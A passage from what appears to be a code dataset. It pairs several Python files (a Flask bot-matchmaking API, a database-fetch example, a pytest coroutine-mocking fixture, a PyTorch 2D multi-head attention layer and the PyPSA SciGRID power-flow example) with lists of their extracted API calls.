target='_blank')\n", (7174, 7232), False, 'from h2o_wave import main, app, Q, ui\n'), ((6393, 6408), 'h2o_wave.ui.zone', 'ui.zone', (['"""code"""'], {}), "('code')\n", (6400, 6408), False, 'from h2o_wave import main, app, Q, ui\n'), ((6426, 6444), 'h2o_wave.ui.zone', 'ui.zone', (['"""preview"""'], {}), "('preview')\n", (6433, 6444), False, 'from h2o_wave import main, app, Q, ui\n')] |
from flask import request, jsonify, abort
from flask.ext.login import login_required, current_user
import bots
from matchmaker import app, db
import matches
import match_logs
import util
import profile
#
# Public API
#
@app.route('/api/matches')
@login_required
def open_matches():
open = matches.OpenMatches(db)
return util.paged_json(open.active(app.config))
@app.route('/api/matches/finished')
@login_required
def finished_matches():
offset = request.args.get('offset', type=int, default=0)
finished = matches.FinishedMatches(db, offset)
pagination, hits = finished.finished(current_user)
return util.paged_json(hits, pagination)
@app.route('/api/matches/<match_id>')
@login_required
def get_match_logs(match_id):
streamer = match_logs.MatchLogBuilder(match_id)
if not streamer.valid():
abort(404)
return jsonify(streamer.data())
@app.route('/api/bot/<guid_or_key>')
def get_bot(guid_or_key):
bot = bots.BotInfo(db, guid_or_key).bot
if not bot:
abort(404)
return jsonify({
"success": True,
"bot": bot,
})
@app.route('/api/bot/<name>', methods=['POST'])
@login_required
def new_bot(name):
creator = profile.BotMaker(current_user, name)
bot = creator.create(db)
return jsonify({
"success": True,
"bot": bot,
})
#
# Internal API
#
@app.route('/api/internal/new_match', methods=['POST'])
def new_match():
maker = matches.NewMatch()
maker.create(db)
return jsonify(**{
"key": maker.guid(),
"success": True,
})
@app.route('/api/internal/join/<game_key>', methods=['POST'])
def player_joined(game_key):
bot_key = request.args.get('key')
joiner = matches.MatchJoiner(game_key, bot_key)
code, message = joiner.join(db)
return jsonify(status=code, message=message), code
@app.route('/api/internal/finished/<game_key>', methods=['POST'])
def game_finished(game_key):
match_results = request.get_json(force=True)
if not match_results:
abort(404)
writer = matches.MatchResultsWriter(game_key)
if not writer.valid():
abort(404)
writer.record(db, match_results)
new_match = matches.MatchCreatorJob(db)
new_match.run()
return jsonify({"success": True})
| [
"flask.request.args.get",
"bots.BotInfo",
"matches.OpenMatches",
"profile.BotMaker",
"matches.MatchJoiner",
"flask.jsonify",
"matches.NewMatch",
"matches.MatchCreatorJob",
"match_logs.MatchLogBuilder",
"matches.MatchResultsWriter",
"flask.request.get_json",
"matchmaker.app.route",
"util.page... | [((225, 250), 'matchmaker.app.route', 'app.route', (['"""/api/matches"""'], {}), "('/api/matches')\n", (234, 250), False, 'from matchmaker import app, db\n'), ((377, 411), 'matchmaker.app.route', 'app.route', (['"""/api/matches/finished"""'], {}), "('/api/matches/finished')\n", (386, 411), False, 'from matchmaker import app, db\n'), ((667, 703), 'matchmaker.app.route', 'app.route', (['"""/api/matches/<match_id>"""'], {}), "('/api/matches/<match_id>')\n", (676, 703), False, 'from matchmaker import app, db\n'), ((889, 924), 'matchmaker.app.route', 'app.route', (['"""/api/bot/<guid_or_key>"""'], {}), "('/api/bot/<guid_or_key>')\n", (898, 924), False, 'from matchmaker import app, db\n'), ((1106, 1152), 'matchmaker.app.route', 'app.route', (['"""/api/bot/<name>"""'], {'methods': "['POST']"}), "('/api/bot/<name>', methods=['POST'])\n", (1115, 1152), False, 'from matchmaker import app, db\n'), ((1364, 1418), 'matchmaker.app.route', 'app.route', (['"""/api/internal/new_match"""'], {'methods': "['POST']"}), "('/api/internal/new_match', methods=['POST'])\n", (1373, 1418), False, 'from matchmaker import app, db\n'), ((1575, 1635), 'matchmaker.app.route', 'app.route', (['"""/api/internal/join/<game_key>"""'], {'methods': "['POST']"}), "('/api/internal/join/<game_key>', methods=['POST'])\n", (1584, 1635), False, 'from matchmaker import app, db\n'), ((1849, 1913), 'matchmaker.app.route', 'app.route', (['"""/api/internal/finished/<game_key>"""'], {'methods': "['POST']"}), "('/api/internal/finished/<game_key>', methods=['POST'])\n", (1858, 1913), False, 'from matchmaker import app, db\n'), ((298, 321), 'matches.OpenMatches', 'matches.OpenMatches', (['db'], {}), '(db)\n', (317, 321), False, 'import matches\n'), ((465, 512), 'flask.request.args.get', 'request.args.get', (['"""offset"""'], {'type': 'int', 'default': '(0)'}), "('offset', type=int, default=0)\n", (481, 512), False, 'from flask import request, jsonify, abort\n'), ((528, 563), 'matches.FinishedMatches', 'matches.FinishedMatches', (['db', 'offset'], {}), '(db, offset)\n', (551, 563), False, 'import matches\n'), ((630, 663), 'util.paged_json', 'util.paged_json', (['hits', 'pagination'], {}), '(hits, pagination)\n', (645, 663), False, 'import util\n'), ((765, 801), 'match_logs.MatchLogBuilder', 'match_logs.MatchLogBuilder', (['match_id'], {}), '(match_id)\n', (791, 801), False, 'import match_logs\n'), ((1041, 1079), 'flask.jsonify', 'jsonify', (["{'success': True, 'bot': bot}"], {}), "({'success': True, 'bot': bot})\n", (1048, 1079), False, 'from flask import request, jsonify, abort\n'), ((1202, 1238), 'profile.BotMaker', 'profile.BotMaker', (['current_user', 'name'], {}), '(current_user, name)\n', (1218, 1238), False, 'import profile\n'), ((1279, 1317), 'flask.jsonify', 'jsonify', (["{'success': True, 'bot': bot}"], {}), "({'success': True, 'bot': bot})\n", (1286, 1317), False, 'from flask import request, jsonify, abort\n'), ((1448, 1466), 'matches.NewMatch', 'matches.NewMatch', ([], {}), '()\n', (1464, 1466), False, 'import matches\n'), ((1679, 1702), 'flask.request.args.get', 'request.args.get', (['"""key"""'], {}), "('key')\n", (1695, 1702), False, 'from flask import request, jsonify, abort\n'), ((1716, 1754), 'matches.MatchJoiner', 'matches.MatchJoiner', (['game_key', 'bot_key'], {}), '(game_key, bot_key)\n', (1735, 1754), False, 'import matches\n'), ((1963, 1991), 'flask.request.get_json', 'request.get_json', ([], {'force': '(True)'}), '(force=True)\n', (1979, 1991), False, 'from flask import request, jsonify, abort\n'), ((2050, 2086), 'matches.MatchResultsWriter', 'matches.MatchResultsWriter', (['game_key'], {}), '(game_key)\n', (2076, 2086), False, 'import matches\n'), ((2186, 2213), 'matches.MatchCreatorJob', 'matches.MatchCreatorJob', (['db'], {}), '(db)\n', (2209, 2213), False, 'import matches\n'), ((2245, 2271), 'flask.jsonify', 'jsonify', (["{'success': True}"], {}), "({'success': True})\n", (2252, 2271), False, 'from flask import request, jsonify, abort\n'), ((839, 849), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (844, 849), False, 'from flask import request, jsonify, abort\n'), ((961, 990), 'bots.BotInfo', 'bots.BotInfo', (['db', 'guid_or_key'], {}), '(db, guid_or_key)\n', (973, 990), False, 'import bots\n'), ((1019, 1029), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (1024, 1029), False, 'from flask import request, jsonify, abort\n'), ((1802, 1839), 'flask.jsonify', 'jsonify', ([], {'status': 'code', 'message': 'message'}), '(status=code, message=message)\n', (1809, 1839), False, 'from flask import request, jsonify, abort\n'), ((2026, 2036), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (2031, 2036), False, 'from flask import request, jsonify, abort\n'), ((2122, 2132), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (2127, 2132), False, 'from flask import request, jsonify, abort\n')] |
from dataapi import TrackerFeeder
from sqlalchemy import create_engine
import matplotlib.pyplot as plt
connect_dict = {'flavor': 'postgres+psycopg2',
'database': '[DATABASE NAME]',
'schema': '[DATABASE SCHEMA]',
'user': '[USERNAME]',
'password': '[PASSWORD]',
'host': '[HOST ADDRESS]',
'port': '[PORT NUMBER]'}
db_connect = create_engine("{flavor}://{username}:{password}@{host}:{port}/{database}"
.format(host=connect_dict['host'],
database=connect_dict['database'],
username=connect_dict['user'],
password=connect_dict['password'],
port=connect_dict['port'],
flavor=connect_dict['flavor']))
# ===== Examples =====
tf = TrackerFeeder(db_connect)
# Fetch the full metadata table (useful for filtering)
df = tf.fetch_metadata()
print(df)
# fetch specific tickers
df = tf.fetch(['eqs br itub4', 'eqs us jpm'])
print(df)
# fetch assets with certain characteristics
filter_dict = {'sector': ['industrial', 'financial'],
'country': 'BR'}
df = tf.filter_fetch(filter_dict, ret='series')
print(df)
# grab metadata possibilities
param_dict = tf.filter_parameters()
print(param_dict)
| [
"dataapi.TrackerFeeder"
] | [((922, 947), 'dataapi.TrackerFeeder', 'TrackerFeeder', (['db_connect'], {}), '(db_connect)\n', (935, 947), False, 'from dataapi import TrackerFeeder\n')] |
import sys
import os
import pytest
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
@pytest.fixture
def mock_coroutine(mocker, monkeypatch):
def _create_coro_patch(*args):
"""Fixture to mock a corotine. If an object path is given, monkeypatch
the coroutine with the mocked one.
Args:
args (list[str]) Arguments for monkeypatch, e.g. the object path
"""
coro_mock = mocker.Mock()
async def _coroutine(*args, **kwargs):
return coro_mock(*args, **kwargs)
if args:
monkeypatch.setattr(*args, _coroutine)
return _coroutine, coro_mock
return _create_coro_patch
| [
"os.path.dirname"
] | [((84, 109), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (99, 109), False, 'import os\n')] |
import torch
import torch.nn.functional as F
import torch.nn as nn
class multi_head_attention_2d(torch.nn.Module):
def __init__(self, in_channel, key_filters, value_filters,
output_filters, num_heads, dropout_prob=0.5, layer_type='SAME'):
super().__init__()
"""Multihead scaled-dot-product attention with input/output transformations.
Args:
inputs: a Tensor with shape [batch, h, w, channels]
key_filters: an integer. Note that queries have the same number
of channels as keys
value_filters: an integer
output_depth: an integer
num_heads: an integer dividing key_filters and value_filters
layer_type: a string, type of this layer -- SAME, DOWN, UP
Returns:
A Tensor of shape [batch, _h, _w, output_filters]
Raises:
ValueError: if the key_filters or value_filters are not divisible
by the number of attention heads.
"""
if key_filters % num_heads != 0:
raise ValueError("Key depth (%d) must be divisible by the number of "
"attention heads (%d)." % (key_filters, num_heads))
if value_filters % num_heads != 0:
raise ValueError("Value depth (%d) must be divisible by the number of "
"attention heads (%d)." % (value_filters, num_heads))
if layer_type not in ['SAME', 'DOWN', 'UP']:
raise ValueError("Layer type (%s) must be one of SAME, "
"DOWN, UP." % (layer_type))
self.num_heads = num_heads
self.layer_type = layer_type
self.QueryTransform = None
if layer_type == 'SAME':
self.QueryTransform = nn.Conv2d(in_channel, key_filters, kernel_size=1, stride=1,
padding=0, bias=True)
elif layer_type == 'DOWN':
self.QueryTransform = nn.Conv2d(in_channel, key_filters, kernel_size=3, stride=2,
padding=1, bias=True) # author use bias
elif layer_type == 'UP':
self.QueryTransform = nn.ConvTranspose2d(in_channel, key_filters, kernel_size=3, stride=2,
padding=1, bias=True)
self.KeyTransform = nn.Conv2d(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias=True)
self.ValueTransform = nn.Conv2d(in_channel, value_filters, kernel_size=1, stride=1, padding=0, bias=True)
self.attention_dropout = nn.Dropout(dropout_prob)
self.outputConv = nn.Conv2d(value_filters, output_filters, kernel_size=1, stride=1, padding=0, bias=True)
self._scale = (key_filters // num_heads) ** 0.5
def forward(self, inputs):
"""
:param inputs: B, C, H, W
:return: inputs: B, Co, Hq, Wq
"""
if self.layer_type == 'SAME' or self.layer_type == 'DOWN':
q = self.QueryTransform(inputs)
elif self.layer_type == 'UP':
q = self.QueryTransform(inputs, output_size=(inputs.shape[2]*2, inputs.shape[3]*2))
# [B, Hq, Wq, Ck]
k = self.KeyTransform(inputs).permute(0, 2, 3, 1)
v = self.ValueTransform(inputs).permute(0, 2, 3, 1)
q = q.permute(0, 2, 3, 1)
Batch, Hq, Wq = q.shape[0], q.shape[1], q.shape[2]
#[B, H, W, N, Ck]
k = self.split_heads(k, self.num_heads)
v = self.split_heads(v, self.num_heads)
q = self.split_heads(q, self.num_heads)
#[(B, H, W, N), c]
k = torch.flatten(k, 0, 3)
v = torch.flatten(v, 0, 3)
q = torch.flatten(q, 0, 3)
# normalize
q = q / self._scale
# attention
#[(B, Hq, Wq, N), (B, H, W, N)]
A = torch.matmul(q, k.transpose(0, 1))
A = torch.softmax(A, dim=1)
A = self.attention_dropout(A)
# [(B, Hq, Wq, N), C]
O = torch.matmul(A, v)
# [B, Hq, Wq, C]
O = O.view(Batch, Hq, Wq, v.shape[-1]*self.num_heads)
# [B, C, Hq, Wq]
O = O.permute(0, 3, 1, 2)
# [B, Co, Hq, Wq]
O = self.outputConv(O)
return O
def split_heads(self, x, num_heads):
"""Split channels (last dimension) into multiple heads.
Args:
x: a Tensor with shape [batch, h, w, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, h, w, num_heads, channels / num_heads]
"""
channel_num = x.shape[-1]
return x.view(x.shape[0], x.shape[1], x.shape[2], num_heads, int(channel_num/num_heads))
if __name__ == '__main__':
device = torch.device('cpu') #cuda:0
inputs = torch.rand(20, 50, 50).unsqueeze(0).to(device)
net = multi_head_attention_2d(20, 4, 4, 11, 4, 0.5, 'UP') # 'SAME', 'DOWN', 'UP'
res = net(inputs)
print('input shape:', inputs.shape)
print('res shape:', res.shape) | [
"torch.nn.Dropout",
"torch.rand",
"torch.nn.Conv2d",
"torch.softmax",
"torch.matmul",
"torch.nn.ConvTranspose2d",
"torch.flatten",
"torch.device"
] | [((4702, 4721), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (4714, 4721), False, 'import torch\n'), ((2330, 2416), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias\n =True)\n', (2339, 2416), True, 'import torch.nn as nn\n'), ((2442, 2529), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'value_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, value_filters, kernel_size=1, stride=1, padding=0,\n bias=True)\n', (2451, 2529), True, 'import torch.nn as nn\n'), ((2559, 2583), 'torch.nn.Dropout', 'nn.Dropout', (['dropout_prob'], {}), '(dropout_prob)\n', (2569, 2583), True, 'import torch.nn as nn\n'), ((2611, 2702), 'torch.nn.Conv2d', 'nn.Conv2d', (['value_filters', 'output_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(value_filters, output_filters, kernel_size=1, stride=1, padding=0,\n bias=True)\n', (2620, 2702), True, 'import torch.nn as nn\n'), ((3581, 3603), 'torch.flatten', 'torch.flatten', (['k', '(0)', '(3)'], {}), '(k, 0, 3)\n', (3594, 3603), False, 'import torch\n'), ((3616, 3638), 'torch.flatten', 'torch.flatten', (['v', '(0)', '(3)'], {}), '(v, 0, 3)\n', (3629, 3638), False, 'import torch\n'), ((3651, 3673), 'torch.flatten', 'torch.flatten', (['q', '(0)', '(3)'], {}), '(q, 0, 3)\n', (3664, 3673), False, 'import torch\n'), ((3842, 3865), 'torch.softmax', 'torch.softmax', (['A'], {'dim': '(1)'}), '(A, dim=1)\n', (3855, 3865), False, 'import torch\n'), ((3948, 3966), 'torch.matmul', 'torch.matmul', (['A', 'v'], {}), '(A, v)\n', (3960, 3966), False, 'import torch\n'), ((1793, 1879), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias\n =True)\n', (1802, 1879), True, 'import torch.nn as nn\n'), ((1976, 2062), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=3, stride=2, padding=1, bias\n =True)\n', (1985, 2062), True, 'import torch.nn as nn\n'), ((2178, 2272), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['in_channel', 'key_filters'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=3, stride=2,\n padding=1, bias=True)\n', (2196, 2272), True, 'import torch.nn as nn\n'), ((4744, 4766), 'torch.rand', 'torch.rand', (['(20)', '(50)', '(50)'], {}), '(20, 50, 50)\n', (4754, 4766), False, 'import torch\n')] |
# -*- coding: utf-8 -*-
## LOPF then non-linear power flow with SciGRID
#
# This Jupyter Notebook is also available to download at: <https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.ipynb> and can be viewed as an HTML page at: <https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.html>.
#
# In this example, the dispatch of generators is optimised using the linear OPF, then a non-linear power flow is run on the resulting dispatch.
#
# The data files for this example are in the examples folder of the github repository: <https://github.com/PyPSA/PyPSA>.
#
### Data sources
#
# Grid: based on [SciGRID](http://scigrid.de/) Version 0.2 which is based on [OpenStreetMap](http://www.openstreetmap.org/).
#
# Load size and location: based on Landkreise (NUTS 3) GDP and population.
#
# Load time series: from ENTSO-E hourly data, scaled up uniformly by factor 1.12 (a simplification of the methodology in Schumacher, Hirth (2015)).
#
# Conventional power plant capacities and locations: BNetzA list.
#
# Wind and solar capacities and locations: EEG Stammdaten, based on http://www.energymap.info/download.html, which represents capacities at the end of 2014. Units without PLZ are removed.
#
# Wind and solar time series: REatlas, Andresen et al, "Validation of Danish wind time series from a new global renewable energy atlas for energy system analysis," Energy 93 (2015) 1074 - 1088.
#
# NB:
#
# All times in the dataset are UTC.
#
# Where SciGRID nodes have been split into 220kV and 380kV substations, all load and generation is attached to the 220kV substation.
#
### Warnings
#
# This script and the data behind it are no longer supported. See https://github.com/PyPSA/pypsa-eur for a newer model that covers the whole of Europe.
#
# This dataset is ONLY intended to demonstrate the capabilities of PyPSA and is NOT (yet) accurate enough to be used for research purposes.
#
# Known problems include:
#
# i) Rough approximations have been made for missing grid data, e.g. 220kV-380kV transformers and connections between close sub-stations missing from OSM.
#
# ii) There appears to be some unexpected congestion in parts of the network, which may mean for example that the load attachment method (by Voronoi cell overlap with Landkreise) isn't working, particularly in regions with a high density of substations.
#
# iii) Attaching power plants to the nearest high voltage substation may not reflect reality.
#
# iv) There is no proper n-1 security in the calculations - this can either be simulated with a blanket e.g. 70% reduction in thermal limits (as done here) or a proper security constrained OPF (see e.g. <https://pypsa.readthedocs.io/en/latest/examples/scigrid-sclopf.ipynb>).
#
# v) The borders and neighbouring countries are not represented.
#
# vi) Hydroelectric power stations are not modelled accurately.
#
# viii) The marginal costs are illustrative, not accurate.
#
# ix) Only the first day of 2011 is in the github dataset, which is not representative. The full year of 2011 can be downloaded at <https://pypsa.readthedocs.io/en/latest/examples/scigrid-with-load-gen-trafos-2011.zip>.
#
# x) The ENTSO-E total load for Germany may not be scaled correctly; it is scaled up uniformly by factor 1.12 (a simplification of the methodology in Schumacher, Hirth (2015), which suggests monthly factors).
#
# xi) Biomass from the EEG Stammdaten are not read in at the moment.
#
# xii) Power plant start up costs, ramping limits/costs, minimum loading rates are not considered.
import os
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pypsa
#%matplotlib inline
# You may have to adjust this path to where
# you downloaded the github repository
# https://github.com/PyPSA/PyPSA
csv_folder_name = (
os.path.dirname(pypsa.__file__)
+ "/../examples/scigrid-de/scigrid-with-load-gen-trafos/"
)
network = pypsa.Network(csv_folder_name=csv_folder_name)
### Plot the distribution of the load and of generating tech
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
load_distribution = (
network.loads_t.p_set.loc[network.snapshots[0]].groupby(network.loads.bus).sum()
)
network.plot(bus_sizes=0.5 * load_distribution, ax=ax, title="Load distribution")
fig.tight_layout()
# fig.savefig('load-distribution.png')
network.generators.groupby("carrier")["p_nom"].sum()
network.storage_units.groupby("carrier")["p_nom"].sum()
techs = ["Gas", "Brown Coal", "Hard Coal", "Wind Offshore", "Wind Onshore", "Solar"]
n_graphs = len(techs)
n_cols = 3
if n_graphs % n_cols == 0:
n_rows = n_graphs // n_cols
else:
n_rows = n_graphs // n_cols + 1
fig, axes = plt.subplots(
nrows=n_rows, ncols=n_cols, subplot_kw={"projection": ccrs.PlateCarree()}
)
size = 4
fig.set_size_inches(size * n_cols, size * n_rows)
for i, tech in enumerate(techs):
i_row = i // n_cols
i_col = i % n_cols
ax = axes[i_row, i_col]
gens = network.generators[network.generators.carrier == tech]
gen_distribution = (
gens.groupby("bus").sum()["p_nom"].reindex(network.buses.index, fill_value=0.0)
)
network.plot(ax=ax, bus_sizes=0.2 * gen_distribution)
ax.set_title(tech)
### Run Linear Optimal Power Flow on the first day of 2011
# to approximate n-1 security and allow room for reactive power flows,
# don't allow any line to be loaded above 70% of their thermal rating
contingency_factor = 0.7
network.lines.s_max_pu = contingency_factor
# There are some infeasibilities without small extensions
network.lines.loc[["316", "527", "602"], "s_nom"] = 1715
# the lines to extend to resolve infeasibilities can
# be found by
# uncommenting the lines below to allow the network to be extended
# network.lines["s_nom_original"] = network.lines.s_nom
# network.lines.s_nom_extendable = True
# network.lines.s_nom_min = network.lines.s_nom
# Assume 450 EUR/MVA/km
# network.lines.capital_cost = 450*network.lines.length
group_size = 4
solver_name = "cbc"
print("Performing linear OPF for one day, {} snapshots at a time:".format(group_size))
network.storage_units.state_of_charge_initial = 0.0
for i in range(int(24 / group_size)):
# set the initial state of charge based on previous round
if i > 0:
network.storage_units.state_of_charge_initial = (
network.storage_units_t.state_of_charge.loc[
network.snapshots[group_size * i - 1]
]
)
network.lopf(
network.snapshots[group_size * i : group_size * i + group_size],
solver_name=solver_name,
keep_files=True,
)
# network.lines.s_nom = network.lines.s_nom_opt
# if lines are extended, look at which ones are bigger
# network.lines[["s_nom_original","s_nom"]][abs(network.lines.s_nom - network.lines.s_nom_original) > 1]
p_by_carrier = network.generators_t.p.groupby(network.generators.carrier, axis=1).sum()
p_by_carrier.drop(
(p_by_carrier.max()[p_by_carrier.max() < 1700.0]).index, axis=1, inplace=True
)
p_by_carrier.columns
colors = {
"Brown Coal": "brown",
"Hard Coal": "k",
"Nuclear": "r",
"Run of River": "green",
"Wind Onshore": "blue",
"Solar": "yellow",
"Wind Offshore": "cyan",
"Waste": "orange",
"Gas": "orange",
}
# reorder
cols = [
"Nuclear",
"Run of River",
"Brown Coal",
"Hard Coal",
"Gas",
"Wind Offshore",
"Wind Onshore",
"Solar",
]
p_by_carrier = p_by_carrier[cols]
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
(p_by_carrier / 1e3).plot(
kind="area",
ax=ax,
linewidth=4,
colors=[colors[col] for col in p_by_carrier.columns],
)
ax.legend(ncol=4, loc="upper left")
ax.set_ylabel("GW")
ax.set_xlabel("")
fig.tight_layout()
# fig.savefig("stacked-gen.png")
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
p_storage = network.storage_units_t.p.sum(axis=1)
state_of_charge = network.storage_units_t.state_of_charge.sum(axis=1)
p_storage.plot(label="Pumped hydro dispatch", ax=ax, linewidth=3)
state_of_charge.plot(label="State of charge", ax=ax, linewidth=3)
ax.legend()
ax.grid()
ax.set_ylabel("MWh")
ax.set_xlabel("")
fig.tight_layout()
# fig.savefig("storage-scigrid.png")
now = network.snapshots[4]
print("With the linear load flow, there is the following per unit loading:")
loading = network.lines_t.p0.loc[now] / network.lines.s_nom
print(loading.describe())
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
network.plot(
ax=ax, line_colors=abs(loading), line_cmap=plt.cm.jet, title="Line loading"
)
fig.tight_layout()
# fig.savefig("line-loading.png")
network.buses_t.marginal_price.loc[now].describe()
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 4)
network.plot(ax=ax, line_widths=pd.Series(0.5, network.lines.index))
plt.hexbin(
network.buses.x,
network.buses.y,
gridsize=20,
C=network.buses_t.marginal_price.loc[now],
cmap=plt.cm.jet,
)
# for some reason the colorbar only works with graphs plt.plot
# and must be attached plt.colorbar
cb = plt.colorbar()
cb.set_label("Locational Marginal Price (EUR/MWh)")
fig.tight_layout()
# fig.savefig('lmp.png')
### Look at variable curtailment
carrier = "Wind Onshore"
capacity = network.generators.groupby("carrier").sum().at[carrier, "p_nom"]
p_available = network.generators_t.p_max_pu.multiply(network.generators["p_nom"])
p_available_by_carrier = p_available.groupby(network.generators.carrier, axis=1).sum()
p_curtailed_by_carrier = p_available_by_carrier - p_by_carrier
p_df = pd.DataFrame(
{
carrier + " available": p_available_by_carrier[carrier],
carrier + " dispatched": p_by_carrier[carrier],
carrier + " curtailed": p_curtailed_by_carrier[carrier],
}
)
p_df[carrier + " capacity"] = capacity
p_df["Wind Onshore curtailed"][p_df["Wind Onshore curtailed"] < 0.0] = 0.0
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
p_df[[carrier + " dispatched", carrier + " curtailed"]].plot(
kind="area", ax=ax, linewidth=3
)
p_df[[carrier + " available", carrier + " capacity"]].plot(ax=ax, linewidth=3)
ax.set_xlabel("")
ax.set_ylabel("Power [MW]")
ax.set_ylim([0, 40000])
ax.legend()
fig.tight_layout()
# fig.savefig("scigrid-curtailment.png")
## Check power flow
now = network.snapshots[0]
for bus in network.buses.index:
bus_sum = network.buses_t.p.loc[now, bus]
branches_sum = 0
for comp in ["lines", "transformers"]:
comps = getattr(network, comp)
comps_t = getattr(network, comp + "_t")
branches_sum += (
comps_t.p0.loc[now, comps.bus0 == bus].sum()
- comps_t.p0.loc[now, comps.bus1 == bus].sum()
)
if abs(bus_sum - branches_sum) > 1e-4:
print(bus, bus_sum, branches_sum)
### Now perform a full Newton-Raphson power flow on the first hour
# For the PF, set the P to the optimised P
network.generators_t.p_set = network.generators_t.p_set.reindex(
columns=network.generators.index
)
network.generators_t.p_set = network.generators_t.p
network.storage_units_t.p_set = network.storage_units_t.p_set.reindex(
columns=network.storage_units.index
)
network.storage_units_t.p_set = network.storage_units_t.p
# set all buses to PV, since we don't know what Q set points are
network.generators.control = "PV"
# set slack
# network.generators.loc["1 Coal","control"] = "Slack"
# Need some PQ buses so that Jacobian doesn't break
f = network.generators[network.generators.bus == "492"]
network.generators.loc[f.index, "control"] = "PQ"
print("Performing non-linear PF on results of LOPF:")
info = network.pf()
# any failed to converge?
(~info.converged).any().any()
print(
"With the non-linear load flow, there is the following per unit loading\nof the full thermal rating:"
)
print((network.lines_t.p0.loc[now] / network.lines.s_nom).describe())
# Get voltage angle differences
df = network.lines.copy()
for b in ["bus0", "bus1"]:
df = pd.merge(
df, network.buses_t.v_ang.loc[[now]].T, how="left", left_on=b, right_index=True
)
s = df[str(now) + "_x"] - df[str(now) + "_y"]
print("The voltage angle differences across the lines have (in degrees):")
print((s * 180 / np.pi).describe())
# plot the reactive power
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
q = network.buses_t.q.loc[now]
bus_colors = pd.Series("r", network.buses.index)
bus_colors[q < 0.0] = "b"
network.plot(
bus_sizes=abs(q),
ax=ax,
bus_colors=bus_colors,
title="Reactive power feed-in (red=+ve, blue=-ve)",
)
fig.tight_layout()
# fig.savefig("reactive-power.png")
network.generators_t.q.loc[now].sum()
network.buses_t.q.loc[now].sum()
| [
"pandas.Series",
"matplotlib.pyplot.hexbin",
"pandas.merge",
"matplotlib.pyplot.colorbar",
"pypsa.Network",
"cartopy.crs.PlateCarree",
"os.path.dirname",
"pandas.DataFrame",
"matplotlib.pyplot.subplots"
] | [((3922, 3968), 'pypsa.Network', 'pypsa.Network', ([], {'csv_folder_name': 'csv_folder_name'}), '(csv_folder_name=csv_folder_name)\n', (3935, 3968), False, 'import pypsa\n'), ((7529, 7547), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (7541, 7547), True, 'import matplotlib.pyplot as plt\n'), ((7851, 7869), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (7863, 7869), True, 'import matplotlib.pyplot as plt\n'), ((8941, 9063), 'matplotlib.pyplot.hexbin', 'plt.hexbin', (['network.buses.x', 'network.buses.y'], {'gridsize': '(20)', 'C': 'network.buses_t.marginal_price.loc[now]', 'cmap': 'plt.cm.jet'}), '(network.buses.x, network.buses.y, gridsize=20, C=network.buses_t\n .marginal_price.loc[now], cmap=plt.cm.jet)\n', (8951, 9063), True, 'import matplotlib.pyplot as plt\n'), ((9188, 9202), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (9200, 9202), True, 'import matplotlib.pyplot as plt\n'), ((9680, 9871), 'pandas.DataFrame', 'pd.DataFrame', (["{(carrier + ' available'): p_available_by_carrier[carrier], (carrier +\n ' dispatched'): p_by_carrier[carrier], (carrier + ' curtailed'):\n p_curtailed_by_carrier[carrier]}"], {}), "({(carrier + ' available'): p_available_by_carrier[carrier], (\n carrier + ' dispatched'): p_by_carrier[carrier], (carrier +\n ' curtailed'): p_curtailed_by_carrier[carrier]})\n", (9692, 9871), True, 'import pandas as pd\n'), ((10021, 10039), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (10033, 10039), True, 'import matplotlib.pyplot as plt\n'), ((12533, 12568), 'pandas.Series', 'pd.Series', (['"""r"""', 'network.buses.index'], {}), "('r', network.buses.index)\n", (12542, 12568), True, 'import pandas as pd\n'), ((3815, 3846), 'os.path.dirname', 'os.path.dirname', (['pypsa.__file__'], {}), '(pypsa.__file__)\n', (3830, 3846), False, 'import os\n'), ((12093, 12186), 'pandas.merge', 'pd.merge', (['df', 